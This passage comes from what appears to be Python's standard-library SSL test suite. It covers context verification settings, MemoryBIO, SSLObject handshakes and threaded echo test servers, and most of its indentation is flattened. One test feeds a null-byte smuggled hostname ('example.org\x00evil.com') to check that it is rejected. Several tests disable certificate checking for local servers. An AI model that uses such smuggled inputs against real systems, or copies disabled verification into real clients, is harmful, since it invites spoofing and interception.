ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # Enabling check_hostname again auto-sets CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
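        # sslsocket_class and sslobject_class let wrap_socket() / wrap_bio()
        # return custom subclasses.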
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
    def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
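        # MemoryBIO behaves as a FIFO byte buffer: writes append, read() drains.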
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
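        # Drive client and server SSLObjects through the handshake by shuttling
        # data between their memory BIOs, then verify the close-notify
        # semantics of unwrap().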
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
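        # load_verify_locations(cadata=...) accepts the signing CA as either
        # PEM text or DER bytes.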
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop: call func(*args) and, depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and the
        # memory BIOs until the call completes.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
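        # Handshake against the background server via MemoryBIO objects;
        # cipher, version and peer certificate only become available once the
        # handshake has completed.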
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
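        # After a BIO-based handshake, write a request and read back the
        # server's lowercased echo through the memory BIOs.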
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
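    # Shared helper: fetch the server's certificate both without and with a
    # CA file and check that a PEM blob is returned.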
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail: CERTFILE cannot verify the server's certificate chain
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
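            # Read from the TLS connection once established, otherwise from
            # the raw socket (pre-STARTTLS).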
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
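    # __enter__() hands run() a threading.Event via start(); run() sets the
    # event once the socket is listening, so "with ThreadedEchoServer(...)"
    # only returns after the server is ready to accept connections.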
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
